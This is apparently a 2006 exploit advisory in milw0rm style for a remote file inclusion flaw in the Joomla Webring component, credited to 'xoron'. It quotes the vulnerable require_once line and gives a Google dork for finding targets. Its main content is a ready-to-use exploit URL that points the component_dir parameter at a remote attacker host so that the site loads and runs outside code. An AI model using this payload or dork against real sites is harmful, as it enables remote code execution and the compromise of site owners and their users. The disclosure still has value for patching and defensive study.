42 lines
No EOL
1.2 KiB
Text
42 lines
No EOL
1.2 KiB
Text
####################################################
|
|
# #
|
|
# C Y BE R - W A R R i O R T I M #
|
|
# #
|
|
####################################################
|
|
|
|
Joomla Webring Component (component_dir) Remote File Inclusion Vulnerabilities
|
|
|
|
####################################################
|
|
|
|
Author: xoron
|
|
|
|
####################################################
|
|
|
|
Class : Remote
|
|
|
|
####################################################
|
|
|
|
cont@ct: x0r0n[at]hotmail[dot]com
|
|
|
|
####################################################
|
|
|
|
Code: in admin.webring.docs.php, line 12
|
|
|
|
require_once ($component_dir. "mungdocs.class.php");
|
|
|
|
####################################################
|
|
|
|
Google dork: inurl:com_webring
|
|
|
|
####################################################
|
|
|
|
Exploit:
|
|
http://www.site.com/[path]/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://evil_scripts?
|
|
|
|
####################################################
|
|
|
|
Greetz: str0ke, Preddy, Ironfist, x-master, DJR, R3D4C!D
|
|
|
|
####################################################
|
|
|
|
# milw0rm.com [2006-08-13] |